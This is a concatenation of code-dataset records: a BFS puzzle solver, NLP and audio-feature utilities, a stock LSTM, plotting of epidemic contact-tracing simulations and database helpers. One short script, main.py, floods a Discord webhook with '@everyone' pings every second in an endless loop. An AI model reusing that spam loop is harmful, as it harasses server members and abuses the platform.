newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft + 1, 'left',\n cur_state.cannibalRight, cur_state.missionaryRight - 1)\n\t\t## One missionary crosses right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 1, cur_state.missionaryLeft, 'left',\n cur_state.cannibalRight - 1, cur_state.missionaryRight)\n\t\t## One cannibal crosses right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\treturn children\n\ndef BFS():\n\tinitialState = State(3,3,'left',0,0)\n\tif initialState.isGoal():\n\t\treturn initialState\n\tfrontier = list()\n\texplored = set()\n\tfrontier.append(initialState)\n\twhile frontier:\n\t\tstate = frontier.pop(0)\n\t\tif state.isGoal():\n\t\t\treturn state\n\t\texplored.add(state)\n\t\tchildren = successors(state)\n\t\tfor child in children:\n\t\t\tif (child not in explored) or (child not in frontier):\n\t\t\t\tfrontier.append(child)\n\treturn None\n\ndef printSolution(solution):\n\t\tpath = []\n\t\tpath.append(solution)\n\t\tparent = solution.parent\n\t\twhile parent:\n\t\t\tpath.append(parent)\n\t\t\tparent = parent.parent\n\n\t\tfor t in range(len(path)):\n\t\t\tstate = path[len(path) - t - 1]\n\t\t\tprint (\"(\"+ str(state.cannibalLeft) + \",\" + str(state.missionaryLeft) + \",\" + state.boat + \",\" + str(state.cannibalRight) + \",\" + str(state.missionaryRight)+ \")\")\n\ndef main():\n\tsolution = BFS()\n\tprint (\"CannibalLeft, MissionaryLeft, Boat, CannibalRight, MissionaryRight\")\n\tprintSolution(solution)\n\n\nmain()","sub_path":"MissonaryAndCannibals.py","file_name":"MissonaryAndCannibals.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"10137285","text":"import os\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom nltk.tokenize import word_tokenize\n\n\nfrom medical_transcrition_nlp.train_word_vec import train_word_vec\nfrom medical_transcrition_nlp.Constants.DocConstants import MAXEPOCHS,VECSIZE,ALPHA,MINCOUNT,MINALPHA,FILENAME\n\nclass train_doc_vec(train_word_vec):\n\n def applytocol(self):\n pass\n\n def train(self):\n tagged_data = [TaggedDocument(words=word_tokenize(_d.lower()), tags=[str(i)]) for i, _d in\n enumerate(self.dataset['transcription'])]\n\n self.model = Doc2Vec(vector_size=VECSIZE,\n alpha=ALPHA,\n min_alpha=MINALPHA,\n min_count=MINCOUNT,\n dm=1,epochs= MAXEPOCHS)\n\n self.model.build_vocab(tagged_data)\n self.model.train(tagged_data,\n total_examples=self.model.corpus_count,epochs=self.model.epochs)\n\n def save_model(self):\n if not os.path.exists('data'):\n os.mkdir('data')\n self.model.save(os.path.join('data',FILENAME))\n\n def load_model(self,filename):\n self.pretrained_model = Doc2Vec.load(os.path.join('data',filename))\n","sub_path":"medical_transcrition_nlp/train_doc_vec.py","file_name":"train_doc_vec.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16756397","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nFollow up for H-Index: What if the citations array is sorted in ascending order? Could you optimize your algorithm?\n\nHint:\n\nExpected runtime complexity is in O(log n) and the input is sorted.\n\"\"\"\n\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n if not citations:\n return 0\n i, j = 0, len(citations)\n while i < j:\n mid = (i + j) / 2\n if citations[mid] >= len(citations) - mid:\n if mid == j:\n break\n j = mid\n else:\n i = mid + 1\n return len(citations) - j\n","sub_path":"Python/275-H-index2/hIndex.py","file_name":"hIndex.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"142446317","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom keras.datasets import stock_one\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, TimeDistributedDense, Dropout, Activation, Merge\nfrom keras.regularizers import l2, l1\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM, GRU\nfrom keras.utils import np_utils\nfrom keras.objectives import to_categorical, categorical_crossentropy\nfrom keras.datasets import stock_one\nimport numpy as np\n\nbatch_size = 128\nnb_epoch = 1000\nnorm = 'minmax'\nhidden_units = 256\n#maxlen = 100\nstep = 50\ntrain_days = 2000/step\ntest_days = 1000/step\nnb_sample = 100\ntg=-1\n#train_split = 0.8\nstock_num = 'pkl_tables/600674'\n\n#np.random.seed(1337) # for reproducibility\n\ndef load_data(sz, maxlen, stock_num, norm, step):\n # the data, shuffled and split between tran and test sets\n (X, Y, mins, maxs) = stock_one.load_data('/home/zhaowuxia/dl_tools/datasets/stock/%s.pkl'%(stock_num), norm = norm, sz = sz, maxlen = None, step = step, reverse=True ) \n print(X.shape, Y.shape, mins.shape, maxs.shape)\n\n sz = X.shape[0]\n maxlen = min(maxlen, X.shape[1])\n\n X = X[:, -maxlen:, 3].reshape(sz, maxlen, 1)\n Y = np.concatenate((X[:, 1:, :], Y[:, 3].reshape(sz, 1, 1)), axis=1)\n mins = mins[:, 3]\n maxs = maxs[:, 3]\n return (X, Y, mins, maxs)\n\ndef build_model():\n model = Sequential()\n model.add(LSTM(input_dim=1, output_dim=hidden_units,init='glorot_normal', return_sequences=True,truncate_gradient=tg))\n #model.add(Dropout(0.5))\n model.add(TimeDistributedDense(hidden_units, 1))\n #model.add(Activation('relu'))\n\n #sgd=SGD(lr=1e-3, momentum=0.95, nesterov=True, clipnorm=5.0)\n #rms = RMSprop(clipnorm=5.0)\n model.compile(loss='mae', optimizer='adam')\n return model\n\ndef write_csv(save_path, gnd, pred):\n # gnd: [T, 1]\n # pred: [T, 1]\n T = pred.shape[0]\n with open(save_path, 'w') as f:\n f.write('pred,gnd\\n')\n for i in range(T):\n if i >= len(gnd):\n f.write('%.4f,0,\\n'%pred[i])\n else:\n f.write('%.4f,%.4f,\\n'%(pred[i], gnd[i]))\n\ndef recurrent_predict(model, x_history, pred_step, return_sequences=True):\n # x_history : [nb_sample, T, 1]\n # pred_step : int\n print('Predicting...')\n print(x_history.shape, pred_step)\n T = x_history.shape[1]\n nb_samples = x_history.shape[0]\n x = np.zeros([nb_samples, T+pred_step, 1])\n x[:, :T] = x_history\n y = []\n for i in range(pred_step):\n if i > 0 and i % 100 == 0:\n print('%d steps finishes'%i)\n y=model.predict(x[:, :T+i, :], verbose=0)\n if return_sequences:\n x[:, T+i, :] = y[:, T+i-1, :]\n else:\n x[:, T+i, :] = y.reshape(x[:, T+i, :].shape)\n if return_sequences:\n x[:, 1:T, :] = y[:, :T-1, :]\n print('Finish predicting')\n return x\n\ndef compute_loss(gnd, pred, verbose=False):\n error = np.fabs(gnd-pred)/gnd\n mean_error = error.mean(error.ndim-2)\n if verbose:\n for i in mean_error:\n print('%.4f'%i)\n return mean_error\n\nif __name__=='__main__':\n (X, Y, mins, maxs) = load_data(nb_sample, train_days+test_days, stock_num, norm, step)\n X_train = X[:, :train_days]\n y_train = X[:, :train_days]\n X_test = X[:, :train_days+test_days/2]\n y_test = Y[:, :train_days+test_days/2]\n print(X_train.shape, y_train.shape)\n print(X_test.shape, y_test.shape)\n print(mins.shape, maxs.shape)\n #write_csv('csv/test/%s_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days+test_days), X[0], X[0])\n\n model = build_model()\n #model.load_weights('models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_test, y_test), save_path='models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n model.save_weights('models/test/model_%s_%d_%d_final'%(stock_num.split('/')[-1], nb_sample, train_days), overwrite=True)\n model.load_weights('models/test/model_%s_%d_%d'%(stock_num.split('/')[-1], nb_sample, train_days))\n\n gnd = X.mean(0, keepdims=True)\n pred1 = recurrent_predict(model, gnd[:, :train_days], 2*test_days, return_sequences=True)\n write_csv('csv/test/output_%s_%d_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days, 2*test_days), gnd[0], pred1[0])\n pred2 = recurrent_predict(model, gnd[:, :train_days/2], train_days/2 + test_days, return_sequences=True)\n write_csv('csv/test/output_%s_%d_%d_%d.csv'%(stock_num.split('/')[-1], nb_sample, train_days/2, train_days/2+2*test_days), gnd[0], pred2[0])\n\n pred = recurrent_predict(model, gnd[:, :train_days+test_days/2], test_days/2, return_sequences=True)\n pred = (pred[0]+1)/2*(maxs-mins)+mins\n gnd = (gnd[0]+1)/2*(maxs-mins)+mins\n for step in range(5, test_days/2+1, 5):\n error1 = compute_loss(gnd[train_days+test_days/2:train_days+test_days/2+step], pred[train_days+test_days/2:train_days+test_days/2+step])\n error2 = compute_loss(gnd[train_days+test_days/2:train_days+test_days/2+step], gnd[train_days+test_days/2-step:train_days+test_days/2])\n print('predict step = ', step, ': mean relative loss = ', error1, ', T-1 loss = ', error2)\n","sub_path":"examples/stock/train_one2.py","file_name":"train_one2.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"288256646","text":"import os\nimport logging\n\nfrom django.conf import settings\n\nfrom utils.email import add_outgoing_email\n\nlogger = logging.getLogger(\"bornhack.%s\" % __name__)\n\ndef add_sponsorticket_email(ticket):\n # put formatdict together\n formatdict = {\n \"ticket\": ticket,\n }\n\n subject = \"%s %s Sponsor Ticket %s\" % (\n ticket.sponsor.camp.title,\n ticket.sponsor.name,\n ticket.uuid,\n )\n\n filename = \"sponsor_ticket_{}.pdf\".format(ticket.pk)\n with open(os.path.join(settings.PDF_ARCHIVE_PATH, filename), \"rb\") as f:\n # add email to outgoing email queue\n return add_outgoing_email(\n text_template=\"emails/sponsorticket_email.txt\",\n html_template=\"emails/sponsorticket_email.html\",\n to_recipients=ticket.sponsor.ticket_email,\n formatdict=formatdict,\n subject=subject,\n attachment=f.read(),\n attachment_filename=filename,\n )\n\n","sub_path":"src/sponsors/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"547239965","text":"# -*- coding: utf-8 -*-\n\nfrom ConstantsAndRandom import ConstantsAndRandom\nfrom SimulationEnvironment import SimulationEnvironment\nimport pickle\nimport time as tm\nimport cProfile\nimport pstats\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport math\nfrom SimulationClass import SimulationClass\nfrom ConfidenceInterval import ConfidenceInterval\nimport csv\nimport numpy as np\n \ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n axs[plotCol].annotate('{:.1f}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3),\n textcoords=\"offset points\",\n ha='center', va='bottom', rotation=90)\n\nsys.setrecursionlimit(10000)\n\npath = \"finishedSimulationStatesConsolidated/\"\n\nfileNameList = os.listdir(path)\nsimulationEnvironmentList = []\nlegendList = []\n\ni = 0\n\n\nfor fileName in fileNameList:\n if fileName==\"_description.txt\" or fileName==\"other\" or fileName==\"figure_1.png\" or fileName==\"figure_2.png\" or fileName==\"figure_3.png\" or fileName==\"figure_3b.png\" or fileName==\"figure_3c.png\" or fileName==\"figure_3d.png\" or fileName==\"figure_3e.png\" or fileName==\"figure_4.png\" or fileName==\"result_file.csv\":\n continue\n se = pickle.load( open( path+fileName, \"rb\" ) )\n simulationEnvironmentList.append(se)\n\nMain_populationSize = 10000\n\nresultValuesPandemicDuration = {}\nresultValuesPandemicDurationCI = {}\nresultValuesQuarantineTime = {}\nresultValuesQuarantineTimeCI = {}\nresultValuesShareSusceptibleAtEnd = {}\nresultValuesShareSusceptibleAtEndCI = {}\nresultValuesQuotient = {}\nresultValuesQuotientCI = {}\nresultValuesShareQuarantineTimeSusceptible = {}\nresultValuesQuarantineTimeSusceptible = {}\nresultValuesQuarantineTimeSusceptibleCI = {}\n\nfor simulationEnvironment in simulationEnvironmentList:\n adoption = simulationEnvironment.contactTracingAdoptionPercentage\n valuePandemicDuration = simulationEnvironment.ci_timeOfPandemic.mean\n valuePandemicDurationCI = simulationEnvironment.ci_timeOfPandemic.halfInterval\n valueQuarantineTime = simulationEnvironment.ci_averageTimeOfQuarantinePerPerson.mean\n valueQuarantineTimeCI = simulationEnvironment.ci_averageTimeOfQuarantinePerPerson.halfInterval\n valueShareSusceptibleAtEnd = 100 * simulationEnvironment.ci_shareOfSusceptiblePeopleAtTheEnd.mean\n valueShareSusceptibleAtEndCI = 100 * simulationEnvironment.ci_shareOfSusceptiblePeopleAtTheEnd.halfInterval\n valueQuotient = 100 * simulationEnvironment.ci_quotient.mean\n valueQuotientCI = 100 * simulationEnvironment.ci_quotient.halfInterval\n valueShareQuarantineTimeSusceptible = 100 * simulationEnvironment.ci_shareDaysSpentInQuarantineOfPeopleSusceptibleByTotalQuarantineDays.mean\n valueQuarantineTimeSusceptible = simulationEnvironment.ci_totalDaysSpentInQuarantineOfPeopleSusceptible.mean / 10000\n valueQuarantineTimeSusceptibleCI = simulationEnvironment.ci_totalDaysSpentInQuarantineOfPeopleSusceptible.halfInterval / 10000\n a = 0\n\n if(simulationEnvironment.contactTracingOn == False):\n adoption = 0\n\n if(simulationEnvironment.firstID% 46 < 26):\n resultValuesPandemicDuration.setdefault(adoption, []).append(valuePandemicDuration)\n resultValuesPandemicDurationCI.setdefault(adoption, []).append(valuePandemicDurationCI)\n resultValuesQuarantineTime.setdefault(adoption, []).append(valueQuarantineTime)\n resultValuesQuarantineTimeCI.setdefault(adoption, []).append(valueQuarantineTimeCI)\n resultValuesShareSusceptibleAtEnd.setdefault(adoption, []).append(valueShareSusceptibleAtEnd)\n resultValuesShareSusceptibleAtEndCI.setdefault(adoption, []).append(valueShareSusceptibleAtEndCI)\n resultValuesQuotient.setdefault(adoption, []).append(valueQuotient)\n resultValuesQuotientCI.setdefault(adoption, []).append(valueQuotientCI)\n resultValuesShareQuarantineTimeSusceptible.setdefault(adoption, []).append(valueShareQuarantineTimeSusceptible)\n resultValuesQuarantineTimeSusceptible.setdefault(adoption, []).append(valueQuarantineTimeSusceptible)\n resultValuesQuarantineTimeSusceptibleCI.setdefault(adoption, []).append(valueQuarantineTimeSusceptibleCI)\n \ndataPandemicDuration = [resultValuesPandemicDuration[20], resultValuesPandemicDuration[40], resultValuesPandemicDuration[60], resultValuesPandemicDuration[80], resultValuesPandemicDuration[100]]\ndataPandemicDurationCI = [resultValuesPandemicDurationCI[20], resultValuesPandemicDurationCI[40], resultValuesPandemicDurationCI[60], resultValuesPandemicDurationCI[80], resultValuesPandemicDurationCI[100]]\ndataQuarantineTime = [resultValuesQuarantineTime[20], resultValuesQuarantineTime[40], resultValuesQuarantineTime[60], resultValuesQuarantineTime[80], resultValuesQuarantineTime[100]]\ndataQuarantineTimeCI = [resultValuesQuarantineTimeCI[20], resultValuesQuarantineTimeCI[40], resultValuesQuarantineTimeCI[60], resultValuesQuarantineTimeCI[80], resultValuesQuarantineTimeCI[100]]\ndataShareSusceptibleAtEnd = [resultValuesShareSusceptibleAtEnd[20], resultValuesShareSusceptibleAtEnd[40], resultValuesShareSusceptibleAtEnd[60], resultValuesShareSusceptibleAtEnd[80], resultValuesShareSusceptibleAtEnd[100]]\ndataShareSusceptibleAtEndCI = [resultValuesShareSusceptibleAtEndCI[20], resultValuesShareSusceptibleAtEndCI[40], resultValuesShareSusceptibleAtEndCI[60], resultValuesShareSusceptibleAtEndCI[80], resultValuesShareSusceptibleAtEndCI[100]]\ndataQuotient = [resultValuesQuotient[20], resultValuesQuotient[40], resultValuesQuotient[60], resultValuesQuotient[80], resultValuesQuotient[100]]\ndataQuotientCI = [resultValuesQuotientCI[20], resultValuesQuotientCI[40], resultValuesQuotientCI[60], resultValuesQuotientCI[80], resultValuesQuotientCI[100]]\ndataShareQuarantineTimeSusceptible = [resultValuesShareQuarantineTimeSusceptible[20], resultValuesShareQuarantineTimeSusceptible[40], resultValuesShareQuarantineTimeSusceptible[60], resultValuesShareQuarantineTimeSusceptible[80], resultValuesShareQuarantineTimeSusceptible[100]]\ndataQuarantineTimeSusceptible = [resultValuesQuarantineTimeSusceptible[20], resultValuesQuarantineTimeSusceptible[40], resultValuesQuarantineTimeSusceptible[60], resultValuesQuarantineTimeSusceptible[80], resultValuesQuarantineTimeSusceptible[100]]\ndataQuarantineTimeSusceptibleCI = [resultValuesQuarantineTimeSusceptibleCI[20], resultValuesQuarantineTimeSusceptibleCI[40], resultValuesQuarantineTimeSusceptibleCI[60], resultValuesQuarantineTimeSusceptibleCI[80], resultValuesQuarantineTimeSusceptibleCI[100]]\n\nrows = 1\ncols = 3\nnumberOfPlotsPerSubsection = 5\n\nMain_populationSize = 10000\n\nfig, axs = plt.subplots(rows, cols, figsize=(15,6))\n\nfor simulationEnvironment in simulationEnvironmentList:\n shareList = [100 * x / Main_populationSize for x in simulationEnvironment.averageNumberOfPeopleInfectious]\n\nX = np.linspace(0,2.5,num=5)\nbar_width = 0.1\nbar_group_distance = 0.11\ncolorsBase = ['#dd4d4d', '#d6834f', '#eba639', '#87aa66', '#006400']\ncolorsLight = ['#E67E7E', '#E1A57F', '#F0BE6F', '#A8C190', '#468E46']\n\n[plotRow, plotCol] = [0, 0]\na0=axs[plotCol].bar(-0.15, resultValuesPandemicDuration[0], color = '#000000', width = bar_width, yerr=resultValuesPandemicDurationCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, dataPandemicDuration[0], color = colorsBase[0], width = bar_width, yerr=dataPandemicDurationCI[0], capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, dataPandemicDuration[1], color = colorsBase[1], width = bar_width, yerr=dataPandemicDurationCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, dataPandemicDuration[2], color = colorsBase[2], width = bar_width, yerr=dataPandemicDurationCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, dataPandemicDuration[3], color = colorsBase[3], width = bar_width, yerr=dataPandemicDurationCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, dataPandemicDuration[4], color = colorsBase[4], width = bar_width, yerr=dataPandemicDurationCI[4], capsize=4)\n\naxs[plotCol].set_title(\"A Duration of the epidemic\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Duration of the epidemic, average and 90% CI [days]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption'], loc='upper left')\n\n[plotRow, plotCol] = [0, 1]\na0=axs[plotCol].bar(-0.15, resultValuesShareSusceptibleAtEnd[0], color = '#000000', width = bar_width, yerr=resultValuesShareSusceptibleAtEndCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, dataShareSusceptibleAtEnd[0], color = colorsBase[0], width = bar_width, yerr=dataShareSusceptibleAtEndCI[0], capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, dataShareSusceptibleAtEnd[1], color = colorsBase[1], width = bar_width, yerr=dataShareSusceptibleAtEndCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, dataShareSusceptibleAtEnd[2], color = colorsBase[2], width = bar_width, yerr=dataShareSusceptibleAtEndCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, dataShareSusceptibleAtEnd[3], color = colorsBase[3], width = bar_width, yerr=dataShareSusceptibleAtEndCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, dataShareSusceptibleAtEnd[4], color = colorsBase[4], width = bar_width, yerr=dataShareSusceptibleAtEndCI[4], capsize=4)\n\naxs[plotCol].set_title(\"B Susceptible individuals at the end\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Share of susceptible individuals at the end, average and 90% CI [%]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption'], loc='upper left')\n\n[plotRow, plotCol] = [0, 2]\n\na0=axs[plotCol].bar(-0.15, resultValuesQuarantineTime[0], color = '#000000', width = bar_width, yerr=resultValuesQuarantineTimeCI[0], capsize=4)\na1=axs[plotCol].bar(X + 0, np.array(dataQuarantineTime[0]) - np.array(dataQuarantineTimeSusceptible[0]), bottom=dataQuarantineTimeSusceptible[0], color = colorsBase[0], width = bar_width, yerr=dataQuarantineTimeCI[0], capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, np.array(dataQuarantineTime[1]) - np.array(dataQuarantineTimeSusceptible[1]), bottom=dataQuarantineTimeSusceptible[1], color = colorsBase[1], width = bar_width, yerr=dataQuarantineTimeCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, np.array(dataQuarantineTime[2]) - np.array(dataQuarantineTimeSusceptible[2]), bottom=dataQuarantineTimeSusceptible[2], color = colorsBase[2], width = bar_width, yerr=dataQuarantineTimeCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, np.array(dataQuarantineTime[3]) - np.array(dataQuarantineTimeSusceptible[3]), bottom=dataQuarantineTimeSusceptible[3], color = colorsBase[3], width = bar_width, yerr=dataQuarantineTimeCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, np.array(dataQuarantineTime[4]) - np.array(dataQuarantineTimeSusceptible[4]), bottom=dataQuarantineTimeSusceptible[4], color = colorsBase[4], width = bar_width, yerr=dataQuarantineTimeCI[4], capsize=4)\n\na1b=axs[plotCol].bar(X + 0, dataQuarantineTimeSusceptible[0], hatch=\"//\", color = colorsLight[0], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[0], capsize=4, ecolor='blue')\na2b=axs[plotCol].bar(X + bar_group_distance, dataQuarantineTimeSusceptible[1], hatch=\"//\", color = colorsLight[1], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[1], capsize=4, ecolor='blue')\na3b=axs[plotCol].bar(X + 2 * bar_group_distance, dataQuarantineTimeSusceptible[2], hatch=\"//\", color = colorsLight[2], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[2], capsize=4, ecolor='blue')\na4b=axs[plotCol].bar(X + 3 * bar_group_distance, dataQuarantineTimeSusceptible[3], hatch=\"//\", color = colorsLight[3], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[3], capsize=4, ecolor='blue')\na5b=axs[plotCol].bar(X + 4 * bar_group_distance, dataQuarantineTimeSusceptible[4], hatch=\"//\", color = colorsLight[4], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[4], capsize=4, ecolor='blue')\n\naxs[plotCol].set_title(\"C Quarantine time\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Time of quarantine per person, average and 90% CI [days]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption', '20% adoption, susceptible', '40% adoption, susceptible', '60% adoption, susceptible', '80% adoption, susceptible', '100% adoption, susceptible'], loc='upper left')\n\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\nplt.savefig(path+\"/figure_4.png\")\nplt.show()","sub_path":"print_figure_4.py","file_name":"print_figure_4.py","file_ext":"py","file_size_in_byte":13105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36062670","text":"from discord_webhook import DiscordWebhook, DiscordEmbed\nimport time\n\ndef spam():\n webhook = DiscordWebhook(url='WEBHOOK_URL', content='@everyone')\n\n ## replace WEBHOOK_URL with your webhook url\n\n response = webhook.execute()\n\nwhile True:\n spam()\n time.sleep(1) ## replace 1 with number of seconds you want per post (keep 1 as default due to being rate limited)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"588998977","text":"from sqlalchemy import Column, Integer, String, Date, ForeignKey\nfrom repositories.base import Base\nfrom repositories.turmas import Turma\nfrom repositories.polos import Polo\nfrom repositories.pessoas import Pessoa\n\nclass Aula(Base):\n\t__tablename__ = 'aulas'\n\n\tid_aulas = Column(Integer, primary_key=True)\n\ttema = Column(String)\n\tdescricao = Column(String)\n\tdata = Column(Date)\n\tturmas_id_turmas = Column(Integer, ForeignKey('turmas.id_turmas'))\n\tpolos_id_polos = Column(Integer, ForeignKey('polos.id_polos'))\n\tid_professor = Column(Integer, ForeignKey('pessoas.id_pessoas'))\n\n\tdef to_json(self):\n\t\treturn {\n\t\t\t'id_aulas': self.id_aulas,\n\t\t\t'tema': self.tema,\n\t\t\t'descricao': self.descricao\n\t\t}\n\n\nclass AllAulas():\n\t\n\tdef __init__(self, session):\n\t\tself.session = session\n\n\tdef create(self, tema, descricao, data, turmas_id_turmas, polos_id_polos, id_professor):\n\t\tnova_aula = Aula()\n\t\tnova_aula.tema = tema\n\t\tnova_aula.descricao = descricao\n\t\tnova_aula.data = data\n\t\tnova_aula.turmas_id_turmas = turmas_id_turmas\n\t\tnova_aula.polos_id_polos= polos_id_polos\n\t\tnova_aula.id_professor = id_professor\n\n\t\ttry:\n\t\t\tself.session.add(nova_aula)\n\t\t\tself.session.commit()\n\t\t\treturn nova_aula.to_json()\n\t\texcept:\n\t\t\tself.session.rollback()\n\t\t\traise\n\n\tdef readAll(self):\n\t\taulas = self.session.query(Aula).all()\n\t\tnova_lista = []\n\t\tfor aula in aulas:\n\t\t\tnova_lista.append(aula.to_json())\n\t\treturn nova_lista\n\n\tdef read(self, id_aulas):\n\t\taula = self.session.query(Aula).filter_by(id_aulas = id_aulas).first()\n\t\treturn aula.to_json() if aula else None\n\n\tdef update(self, id_aulas, tema, descricao, data, turmas_id_turmas, polos_id_polos, id_professor):\n\t\ttry:\n\t\t\taula = self.session.query(Aula).filter_by(id_aulas = id_aulas).first()\n\t\t\tif not aula:\n\t\t\t\treturn None\n\t\t\taula.tema = tema\n\t\t\taula.descricao = descricao\n\t\t\taula.data = data\n\t\t\taula.turmas_id_turmas = turmas_id_turmas\n\t\t\taula.polos_id_polos = polos_id_polos\n\t\t\taula.id_professor = id_professor\n\t\t\tself.session.commit()\n\t\t\treturn aula.to_json()\n\t\texcept:\n\t\t\tself.session.rollback()\n\t\t\traise","sub_path":"repositories/aulas.py","file_name":"aulas.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"21652031","text":"#!/usr/bin/env python2\n#-*- encoding: utf-8 -*-\n\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom yaafelib import FeaturePlan, Engine, AudioFileProcessor\n\n\nclass AudioFeatureProcessor(object):\n \"\"\" Yaafe wrapper\n Usage:\n afp = AudioFeatureProcessor(sample_rate)\n data = afp.process(file)\n \n return a conactenated single-dimensional array consisting of\n 7 statistically reduced features\n \"\"\"\n\n FEATURES = {\n 'loudness' : (\"Loudness blockSize=512 stepSize=128 >\"\n \"StatisticalIntegrator NbFrames=40 StepNbFrames=8\"),\n 'mfcc' : (\"MFCC blockSize=512 stepSize=128 > StatisticalIntegrator \"\n \"NbFrames=40 StepNbFrames=8\"),\n 'obsi' : (\"OBSI blockSize=512 stepSize=128 > StatisticalIntegrator \"\n \"NbFrames=40 StepNbFrames=8\"),\n 'obsir' : (\"OBSIR blockSize=512 stepSize=128 >\"\n \"StatisticalIntegrator NbFrames=40 StepNbFrames=8\"),\n 'spect_crest' : (\"SpectralCrestFactorPerBand blockSize=512 \"\n \"stepSize=128 > StatisticalIntegrator NbFrames=40 \"\n \"StepNbFrames=8\"),\n 'spect_flat_band': (\"SpectralFlatnessPerBand blockSize=512 \"\n \"stepSize=128 > StatisticalIntegrator NbFrames=40 \"\n \"StepNbFrames=8\"),\n 'spect_shape' : (\"SpectralShapeStatistics blockSize=512 stepSize=128 \"\n \"> StatisticalIntegrator NbFrames=40 StepNbFrames=8\")\n }\n \n FEATURES = OrderedDict(sorted(FEATURES.items()))\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n self.setup()\n\n def setup(self):\n \"\"\" Initialize Yaafe internal components \"\"\"\n self.fp = FeaturePlan(\n sample_rate = self.sample_rate,\n normalize = 0.98)\n for name, desc in self.FEATURES.items():\n self.fp.addFeature(\"%s: %s\" % (name, desc))\n self.df = self.fp.getDataFlow()\n self.engine = Engine()\n self.engine.load(self.df)\n self.afp = AudioFileProcessor()\n \n def process(self, audiofile):\n self.afp.processFile(self.engine, audiofile)\n out = OrderedDict(sorted(self.engine.readAllOutputs().items()))\n self.engine.flush()\n return self.transform(out)\n \n @staticmethod\n def 